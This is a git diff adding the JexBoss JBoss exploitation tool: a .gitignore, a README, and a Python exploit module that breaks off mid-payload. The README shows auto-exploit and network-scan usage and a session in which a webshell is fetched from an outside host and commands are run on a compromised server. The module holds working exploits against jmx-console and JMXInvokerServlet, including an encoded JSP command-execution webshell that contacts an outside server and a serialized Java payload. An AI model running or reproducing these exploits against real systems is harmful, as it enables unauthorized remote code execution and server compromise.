diff --git a/Jboss_Verify_EXploitation/.gitignore b/Jboss_Verify_EXploitation/.gitignore
new file mode 100644
index 0000000..68a851b
--- /dev/null
+++ b/Jboss_Verify_EXploitation/.gitignore
@@ -0,0 +1,60 @@
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+
+# C extensions
+*.so
+
+# Distribution / packaging
+.Python
+env/
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+lib/
+lib64/
+parts/
+sdist/
+var/
+*.egg-info/
+.installed.cfg
+*.egg
+
+# PyInstaller
+# Usually these files are written by a python script from a template
+# before PyInstaller builds the exe, so as to inject date/other infos into it.
+*.manifest
+*.spec
+
+# Installer logs
+pip-log.txt
+pip-delete-this-directory.txt
+
+# Unit test / coverage reports
+htmlcov/
+.tox/
+.coverage
+.cache
+nosetests.xml
+coverage.xml
+
+# Translations
+*.mo
+*.pot
+
+# Django stuff:
+*.log
+
+# Sphinx documentation
+docs/_build/
+
+# PyBuilder
+target/
+
+# PyCharm project files
+.idea/
+
+# I/O files
+*.csv
diff --git a/Jboss_Verify_EXploitation/README.md b/Jboss_Verify_EXploitation/README.md
new file mode 100644
index 0000000..9228652
--- /dev/null
+++ b/Jboss_Verify_EXploitation/README.md
@@ -0,0 +1,250 @@ +JexBoss - Jboss verify and EXploitation Tool +======= + +JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server. + +Requirements +---- +* Python >= 2.7.x +* [urllib3](https://pypi.python.org/pypi/urllib3) +* [ipaddress](https://pypi.python.org/pypi/ipaddress) + +Installation +---- +To install the latest version of JexBoss, please use the following commands: + + git clone https://github.com/joaomatosf/jexboss.git + cd jexboss + pip install -r requires.txt + python jexboss.py -h + + OR: + + Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip + unzip master.zip + cd jexboss-master + pip install -r requires.txt + python jexboss.py -h + + +If you are using CentOS with Python 2.6, please install Python2.7. +Installation example of the Python 2.7 on CentOS using Collections Software scl: + + yum -y install centos-release-scl + yum -y install python27 + scl enable python27 bash + + +Features +---- +The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server. 
+ +The exploitation vectors are: + +* /admin-console [ NEW ] + - tested and working in JBoss versions 5 and 6 +* /jmx-console + - tested and working in JBoss versions 4, 5 and 6 +* /web-console/Invoker + - tested and working in JBoss versions 4 +* /invoker/JMXInvokerServlet + - tested and working in JBoss versions 4 and 5 + +Screenshots +---- + +* Standalone mode: +``` +$ python jexboss.py -host 192.168.0.114:8080 +``` +![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/standalone_mode.png) + +* Usage modes: +``` +$ python jexboss.py -h +``` +![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/help_usage.png) + +* Network scan mode: +``` +$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt +``` +![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/network_scan_mode.png) + +* Network scan with auto-exploit mode: +``` +$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt +``` +![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/scan_with_auto_exploit_mode.png) + + +* Results and recommendations: + +![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/results_and_recommendations.png) + +Usage example +---- +* Check the file "demo.png" + +* Auto scan mode: +``` +$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log +``` + +* File scan mode: +``` +$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log +``` + +* More Options: + +``` +$ python jexboss.py -h + +optional arguments: + -h, --help show this help message and exit + --version show program's version number and exit + --auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE + PERMISSION!!!) 
+ --disable-check-updates, -D + Disable the check for updates performed by JSP + Webshell at: + http://webshell.jexboss.net/jsp_version.txt + -mode {auto-scan,file-scan,standalone} + Operation mode + +Standalone mode: + -host HOST Host address to be checked (eg. + http://192.168.0.10:8080) + +Auto scan mode: + -network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8) + -ports PORTS List of ports separated by commas to be checked for + each host (eg. 8080,8443,8888,80,443) + -results FILENAME File name to store the auto scan results + +File scan mode: + -file FILENAME_HOSTS Filename with host list to be scanned (one host per + line) + -out FILENAME_RESULTS + File name to store the file scan results + +``` + +* Standalone mode: + +``` +* Via git: + +$ git clone https://github.com/joaomatosf/jexboss.git +$ cd jexboss +$ python jexboss.py -host https://site-teste.com + +* Or via download: + +$ wget https://github.com/joaomatosf/jexboss/archive/master.zip +$ unzip master.zip +$ cd jexboss-master +$ python jexboss.py -host https://site-teste.com + + + * --- JexBoss: Jboss verify and EXploitation Tool --- * + | | + | @author: João Filho Matos Figueiredo | + | @contact: joaomatosf@gmail.com | + | | + | @update: https://github.com/joaomatosf/jexboss | + #______________________________________________________# + + + ** Checking Host: https://site-teste.com ** + + * Checking admin-console: [ EXPOSED ] + * Checking web-console: [ OK ] + * Checking jmx-console: [ VULNERABLE ] + * Checking JMXInvokerServlet: [ VULNERABLE ] + + + * Do you want to try to run an automated exploitation via "jmx-console" ? + This operation will provide a simple command shell to execute commands on the server.. + Continue only if you have permission! + yes/NO ? yes + + * Sending exploit code to https://site-teste.com. Wait... + + + * Info: This exploit will force the server to deploy the webshell + available on: http://www.joaomatosf.com/rnp/jbossass.war + * Successfully deployed code! 
Starting command shell, wait... + + * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * + + * https://site-teste.com: + + Linux seglinux 3.18.4-1.el6.elrepo.x86_64 #1 SMP Wed Jan 28 13:28:52 EST 2015 x86_64 x86_64 x86_64 GNU/Linux + + CentOS release 6.5 (Final) + + uid=509(jboss) gid=509(jboss) grupos=509(jboss) context=system_u:system_r:initrc_t:s0 + +[Type commands or "exit" to finish] +Shell> pwd +/usr/jboss-6.1.0.Final/bin + +[Type commands or "exit" to finish] +Shell> hostname +fwgw + +[Type commands or "exit" to finish] +Shell> ls -all /home +total 16 +drwxr-xr-x. 4 root root 4096 Jan 26 2015 . +dr-xr-xr-x. 23 root root 4096 Mar 31 04:51 .. +-rwxrwxrwx. 1 root root 0 Jan 26 2015 file1 +-rw-r-----. 1 root root 0 Jan 26 2015 file2 +-rw-rw-r--. 1 root root 0 Jan 26 2015 file3 +drwx------. 2 joao joao 4096 Jan 26 2015 joao +drwx------. 2 maria maria 4096 Jan 26 2015 maria + +[Type commands or "exit" to finish] +Shell>exit + +Results: potentially compromised server! + * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -* + Recommendations: + - Remove web consoles and services that are not used, eg: + $ rm web-console.war + $ rm http-invoker.sar + $ rm jmx-console.war + $ rm jmx-invoker-adaptor-server.sar + $ rm admin-console.war + - Use a reverse proxy (eg. nginx, apache, F5) + - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY) + - Search vestiges of exploitation within the directories "deploy" and "management". + + References: + [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole + [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf + + - If possible, discard this server! 
+ * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -* + + * Info: review, suggestions, updates, etc: + https://github.com/joaomatosf/jexboss + + * DONATE: Please consider making a donation to help improve this tool, + including research to new versions of JBoss and zero days. + + * Paypal: joaomatosf@gmail.com + * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C + * URI: bitcoin:14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C?label=jexboss +``` + + + +Questions, problems, suggestions and etc: +---- + +* joaomatosf@gmail.com + + diff --git a/Jboss_Verify_EXploitation/_exploits.py b/Jboss_Verify_EXploitation/_exploits.py new file mode 100644 index 0000000..6d30bd7 --- /dev/null +++ b/Jboss_Verify_EXploitation/_exploits.py 
@@ -0,0 +1,555 @@ +# -*- coding: utf-8 -*- +""" +Module to group exploits of the JexBoss +https://github.com/joaomatosf/jexboss + +Copyright 2013 João Filho Matos Figueiredo + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +""" + +from jexboss import * +from random import randint +import urllib +from sys import version_info +if version_info[0] >= 3: + from urllib.parse import quote + + +def exploit_jmx_console_main_deploy(url): + """ + Exploit MainDeployer to deploy a JSP shell. Does not work in JBoss 5 (bug in JBoss 5). + /jmx-console/HtmlAdaptor + :param url: The url to exploit + :return: The HTTP status code + """ + if not 'http' in url[:4]: + url = "http://"+url + + jsp = "http://www.joaomatosf.com/rnp/jexws3.war" + payload = ("/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=" + "MainDeployer&methodIndex=19&arg0="+jsp) + print(GREEN + "\n * Info: This exploit will force the server to deploy the webshell " + + "\n available at: " + jsp + ENDC) + + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, len(user_agents) - 1)]} + pool.request('HEAD', url + payload, redirect=False, headers=headers) + return get_successfully(url, "/jexws3/jexws3.jsp") + + +def exploit_jmx_console_file_repository(url): + """ + Exploit DeploymentFileRepository to deploy a JSP shell + Tested and working in JBoss 4, 5. Does not work in JBoss 6. 
+ /jmx-console/HtmlAdaptor + :param url: The URL to exploit + :return: The HTTP status code + """ + jsp = ("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%75%74%69%6C%2E%2A" + "%2C%6A%61%76%61%2E%69%6F%2E%2A%2C%20%6A%61%76%61%2E%6E%65%74%2E%2A%22%20%70%61%67%65%45" + "%6E%63%6F%64%69%6E%67%3D%22%55%54%46%2D%38%22%25%3E%20%3C%70%72%65%3E%20%3C%25%20%69%6E" + "%74%20%76%65%72%73%69%6F%6E%20%3D%20%33%3B%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65" + "%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20%6E%75%6C%6C%29%20%7B%20" + "%62%6F%6F%6C%65%61%6E%20%63%68%65%63%6B%55%70%64%61%74%65%73%3B%20%48%74%74%70%55%52%4C" + "%43%6F%6E%6E%65%63%74%69%6F%6E%20%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%20%3D" + "%20%6E%75%6C%6C%3B%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%72%20%3D%20%6E%75" + "%6C%6C%3B%20%72%65%73%70%6F%6E%73%65%2E%73%65%74%43%6F%6E%74%65%6E%74%54%79%70%65%28%22" + "%74%65%78%74%2F%68%74%6D%6C%22%29%3B%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65%74%48" + "%65%61%64%65%72%28%22%63%68%65%63%6B%2D%75%70%64%61%74%65%73%22%29%20%21%3D%20%6E%75%6C" + "%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%63%68%65%63%6B" + "%2D%75%70%64%61%74%65%73%22%29%2E%65%71%75%61%6C%73%28%22%66%61%6C%73%65%22%29%29%7B%20" + "%63%68%65%63%6B%55%70%64%61%74%65%73%20%3D%20%66%61%6C%73%65%3B%20%7D%65%6C%73%65%20%7B" + "%20%63%68%65%63%6B%55%70%64%61%74%65%73%20%3D%20%74%72%75%65%3B%20%63%6F%6E%6E%43%68%65" + "%63%6B%55%70%64%61%74%65%73%20%3D%20%28%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F" + "%6E%29%20%6E%65%77%20%55%52%4C%28%22%68%74%74%70%3A%2F%2F%77%65%62%73%68%65%6C%6C%2E%6A" + "%65%78%62%6F%73%73%2E%6E%65%74%2F%6A%73%70%5F%76%65%72%73%69%6F%6E%2E%74%78%74%22%29%2E" + "%6F%70%65%6E%43%6F%6E%6E%65%63%74%69%6F%6E%28%29%3B%20%7D%20%53%74%72%69%6E%67%20%73%68" + "%20%3D%20%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22" + 
"%29%3B%20%53%74%72%69%6E%67%20%6C%61%73%74%48%6F%75%72%43%68%65%63%6B%20%3D%20%28%6E%65" + "%77%20%44%61%74%65%28%29%2E%74%6F%53%74%72%69%6E%67%28%29%2E%73%70%6C%69%74%28%22%3A%22" + "%29%5B%30%5D%2B%22%68%2E%6C%6F%67%22%29%2E%72%65%70%6C%61%63%65%41%6C%6C%28%22%20%22%2C" + "%20%22%2D%22%29%3B%20%74%72%79%7B%20%69%66%20%28%63%68%65%63%6B%55%70%64%61%74%65%73%20" + "%3D%3D%20%74%72%75%65%29%7B%20%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%2E%73%65" + "%74%52%65%71%75%65%73%74%50%72%6F%70%65%72%74%79%28%22%55%73%65%72%2D%41%67%65%6E%74%22" + "%2C%20%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%48%6F%73%74%22%29%2B%22" + "%3C%2D%22%2B%72%65%71%75%65%73%74%2E%67%65%74%52%65%6D%6F%74%65%41%64%64%72%28%29%29%3B" + "%20%69%66%20%28%21%6E%65%77%20%46%69%6C%65%28%22%63%68%65%63%6B%5F%22%2B%6C%61%73%74%48" + "%6F%75%72%43%68%65%63%6B%29%2E%65%78%69%73%74%73%28%29%29%7B%20%50%72%69%6E%74%57%72%69" + "%74%65%72%20%77%72%69%74%65%72%20%3D%20%6E%65%77%20%50%72%69%6E%74%57%72%69%74%65%72%28" + "%22%63%68%65%63%6B%5F%22%2B%6C%61%73%74%48%6F%75%72%43%68%65%63%6B%29%3B%20%77%72%69%74" + "%65%72%2E%63%6C%6F%73%65%28%29%3B%20%62%72%20%3D%20%6E%65%77%20%42%75%66%66%65%72%65%64" + "%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28" + "%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%2E%67%65%74%49%6E%70%75%74%53%74%72%65" + "%61%6D%28%29%29%29%3B%20%69%6E%74%20%6C%61%73%74%56%65%72%73%69%6F%6E%20%3D%20%49%6E%74" + "%65%67%65%72%2E%70%61%72%73%65%49%6E%74%28%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%2E%73" + "%70%6C%69%74%28%22%20%22%29%5B%31%5D%29%3B%20%69%66%20%28%6C%61%73%74%56%65%72%73%69%6F" + "%6E%20%3E%20%76%65%72%73%69%6F%6E%29%7B%20%6F%75%74%2E%70%72%69%6E%74%28%22%50%6C%65%61" + "%73%65%20%6E%6F%74%65%3A%20%74%68%65%72%65%20%69%73%20%61%6E%20%75%70%64%61%74%65%20%74" + "%6F%20%4A%65%78%42%6F%73%73%20%4A%53%50%20%57%65%62%73%68%65%6C%6C%2E%20%57%65%20%72%65" + 
"%63%6F%6D%6D%65%6E%64%20%74%68%61%74%20%79%6F%75%20%72%65%72%75%6E%20%74%68%65%20%4A%65" + "%78%42%6F%73%73%20%74%6F%20%72%65%64%65%70%6C%6F%79%20%74%68%65%20%6E%65%77%20%76%65%72" + "%73%69%6F%6E%20%6F%66%20%77%65%62%73%68%65%6C%6C%20%69%6E%20%4A%42%6F%73%73%20%73%65%72" + "%76%65%72%20%74%65%73%74%65%64%2E%22%29%3B%20%7D%20%7D%20%65%6C%73%65%20%69%66%20%28%73" + "%68%2E%63%6F%6E%74%61%69%6E%73%28%22%69%64%22%29%20%7C%7C%20%73%68%2E%63%6F%6E%74%61%69" + "%6E%73%28%22%69%70%63%6F%6E%66%69%67%22%29%29%20%7B%20%63%6F%6E%6E%43%68%65%63%6B%55%70" + "%64%61%74%65%73%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%3B%20%7D%20%7D%20%7D" + "%20%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74" + "%6C%6E%28%22%45%72%72%6F%72%20%63%68%65%63%6B%69%6E%67%20%66%6F%72%20%75%70%64%61%74%65" + "%73%22%29%3B%7D%20%74%72%79%20%7B%20%50%72%6F%63%65%73%73%20%70%3B%20%69%66%20%28%53%79" + "%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%6F%73%2E%6E%61%6D%65%22%29%2E%74" + "%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%20%3E" + "%20%30%20%7C%7C%20%21%53%79%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%66%69" + "%6C%65%2E%73%65%70%61%72%61%74%6F%72%22%29%2E%65%71%75%61%6C%73%28%22%2F%22%29%29%7B%20" + "%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63" + "%28%22%63%6D%64%2E%65%78%65%20%2F%43%20%22%2B%73%68%29%3B%20%7D%20%65%6C%73%65%20%7B%20" + "%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63" + "%28%73%68%29%3B%20%7D%20%62%72%20%3D%20%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64" + "%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%70%2E%67%65" + "%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72" + "%20%3D%20%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%64%69%73%72" + 
"%20%21%3D%20%6E%75%6C%6C%29%20%7B%20%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%64%69%73%72%29" + "%3B%20%64%69%73%72%20%3D%20%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%63%61" + "%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%20%7B%20%6F%75%74%2E%70%72%69%6E%74%6C" + "%6E%28%22%55%6E%6B%6E%6F%77%6E%20%63%6F%6D%6D%61%6E%64%2E%22%29%3B%20%7D%20%7D%20%25%3E") + + payload = ("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=" + "DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=" + "jexws3.war&argType=java.lang.String&arg1=jexws3&argType=java.lang.St" + "ring&arg2=.jsp&argType=java.lang.String&arg3=" + jsp + "&argType=boolean&arg4=True") + + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, len(user_agents) - 1)]} + pool.request('HEAD', url + payload, redirect=False, headers=headers) + return get_successfully(url, "/jexws3/jexws3.jsp") + + +def exploit_jmx_invoker_file_repository(url, version): + """ + Exploits the JMX invoker + tested and works in JBoss 4, 5 + MainDeploy, shell in data + # /invoker/JMXInvokerServlet + :param url: The URL to exploit + :return: + """ + + payload = ("\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e" + "\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c" + "\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xf6\x06\x95\x27\x41\x3e\xa4" + "\xbe\x0c\x00\x00\x78\x70\x70\x77\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72" + "\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72" + "\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65" + "\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65" + "\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70") + payload += ("\xe3\x2c\x60\xe6") if version == 0 else ("\x26\x95\xbe\x0a") + payload += ( + 
"\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61" + "\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75" + "\x65\xea\xcc\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x04\x00" + "\x00\x00\x08\xb4\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e" + "\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29" + "\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x1b\x6a\x61\x76\x61\x78" + "\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e" + "\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c" + "\x6a\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69\x63\x65" + "\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c\x65\x52\x65\x70\x6f" + "\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73\x74\x6f\x72\x65\x75\x71\x00\x7e" + "\x00\x00\x00\x00\x00\x05\x74\x00\x0b\x6a\x65\x78\x69\x6e\x76\x33\x2e\x77\x61" + "\x72\x74\x00\x07\x6a\x65\x78\x69\x6e\x76\x33\x74\x00\x04\x2e\x6a\x73\x70\x74" + "\x07\x79\x3c\x25\x40\x20\x70\x61\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22" + "\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f" + "\x2e\x2a\x2c\x20\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x2a\x22\x20\x70\x61\x67" + "\x65\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x25\x3e" + "\x20\x3c\x70\x72\x65\x3e\x20\x3c\x25\x20\x69\x6e\x74\x20\x76\x65\x72\x73\x69" + "\x6f\x6e\x20\x3d\x20\x33\x3b\x20\x69\x66\x20\x28\x72\x65\x71\x75\x65\x73\x74" + "\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22" + "\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x20\x62\x6f\x6f\x6c\x65\x61" + "\x6e\x20\x63\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x3b\x20\x48\x74\x74" + "\x70\x55\x52\x4c\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x20\x63\x6f\x6e\x6e" + "\x43\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x20\x6e\x75\x6c\x6c" + 
"\x3b\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x20\x62\x72" + "\x20\x3d\x20\x6e\x75\x6c\x6c\x3b\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x73" + "\x65\x74\x43\x6f\x6e\x74\x65\x6e\x74\x54\x79\x70\x65\x28\x22\x74\x65\x78\x74" + "\x2f\x68\x74\x6d\x6c\x22\x29\x3b\x20\x69\x66\x20\x28\x72\x65\x71\x75\x65\x73" + "\x74\x2e\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x63\x68\x65\x63\x6b\x2d" + "\x75\x70\x64\x61\x74\x65\x73\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20\x26" + "\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48\x65\x61\x64\x65\x72" + "\x28\x22\x63\x68\x65\x63\x6b\x2d\x75\x70\x64\x61\x74\x65\x73\x22\x29\x2e\x65" + "\x71\x75\x61\x6c\x73\x28\x22\x66\x61\x6c\x73\x65\x22\x29\x29\x7b\x20\x63\x68" + "\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x20\x66\x61\x6c\x73\x65\x3b" + "\x20\x7d\x65\x6c\x73\x65\x20\x7b\x20\x63\x68\x65\x63\x6b\x55\x70\x64\x61\x74" + "\x65\x73\x20\x3d\x20\x74\x72\x75\x65\x3b\x20\x63\x6f\x6e\x6e\x43\x68\x65\x63" + "\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x20\x28\x48\x74\x74\x70\x55\x52\x4c" + "\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x29\x20\x6e\x65\x77\x20\x55\x52\x4c" + "\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x65\x62\x73\x68\x65\x6c\x6c\x2e\x6a" + "\x65\x78\x62\x6f\x73\x73\x2e\x6e\x65\x74\x2f\x6a\x73\x70\x5f\x76\x65\x72\x73" + "\x69\x6f\x6e\x2e\x74\x78\x74\x22\x29\x2e\x6f\x70\x65\x6e\x43\x6f\x6e\x6e\x65" + "\x63\x74\x69\x6f\x6e\x28\x29\x3b\x20\x7d\x20\x53\x74\x72\x69\x6e\x67\x20\x73" + "\x68\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61" + "\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x3b\x20\x53\x74\x72\x69\x6e" + "\x67\x20\x6c\x61\x73\x74\x48\x6f\x75\x72\x43\x68\x65\x63\x6b\x20\x3d\x20\x28" + "\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67" + "\x28\x29\x2e\x73\x70\x6c\x69\x74\x28\x22\x3a\x22\x29\x5b\x30\x5d\x2b\x22\x68" + "\x2e\x6c\x6f\x67\x22\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x41\x6c\x6c\x28\x22" + 
"\x20\x22\x2c\x20\x22\x2d\x22\x29\x3b\x20\x74\x72\x79\x7b\x20\x69\x66\x20\x28" + "\x63\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x3d\x20\x74\x72\x75" + "\x65\x29\x7b\x20\x63\x6f\x6e\x6e\x43\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65" + "\x73\x2e\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x50\x72\x6f\x70\x65\x72\x74" + "\x79\x28\x22\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x22\x2c\x20\x72\x65\x71" + "\x75\x65\x73\x74\x2e\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x48\x6f\x73" + "\x74\x22\x29\x2b\x22\x3c\x2d\x22\x2b\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65" + "\x74\x52\x65\x6d\x6f\x74\x65\x41\x64\x64\x72\x28\x29\x29\x3b\x20\x69\x66\x20" + "\x28\x21\x6e\x65\x77\x20\x46\x69\x6c\x65\x28\x22\x63\x68\x65\x63\x6b\x7a\x00" + "\x00\x04\x00\x5f\x22\x2b\x6c\x61\x73\x74\x48\x6f\x75\x72\x43\x68\x65\x63\x6b" + "\x29\x2e\x65\x78\x69\x73\x74\x73\x28\x29\x29\x7b\x20\x50\x72\x69\x6e\x74\x57" + "\x72\x69\x74\x65\x72\x20\x77\x72\x69\x74\x65\x72\x20\x3d\x20\x6e\x65\x77\x20" + "\x50\x72\x69\x6e\x74\x57\x72\x69\x74\x65\x72\x28\x22\x63\x68\x65\x63\x6b\x5f" + "\x22\x2b\x6c\x61\x73\x74\x48\x6f\x75\x72\x43\x68\x65\x63\x6b\x29\x3b\x20\x77" + "\x72\x69\x74\x65\x72\x2e\x63\x6c\x6f\x73\x65\x28\x29\x3b\x20\x62\x72\x20\x3d" + "\x20\x6e\x65\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72" + "\x28\x6e\x65\x77\x20\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x52\x65\x61" + "\x64\x65\x72\x28\x63\x6f\x6e\x6e\x43\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65" + "\x73\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29" + "\x29\x3b\x20\x69\x6e\x74\x20\x6c\x61\x73\x74\x56\x65\x72\x73\x69\x6f\x6e\x20" + "\x3d\x20\x49\x6e\x74\x65\x67\x65\x72\x2e\x70\x61\x72\x73\x65\x49\x6e\x74\x28" + "\x62\x72\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x2e\x73\x70\x6c\x69\x74" + "\x28\x22\x20\x22\x29\x5b\x31\x5d\x29\x3b\x20\x69\x66\x20\x28\x6c\x61\x73\x74" + 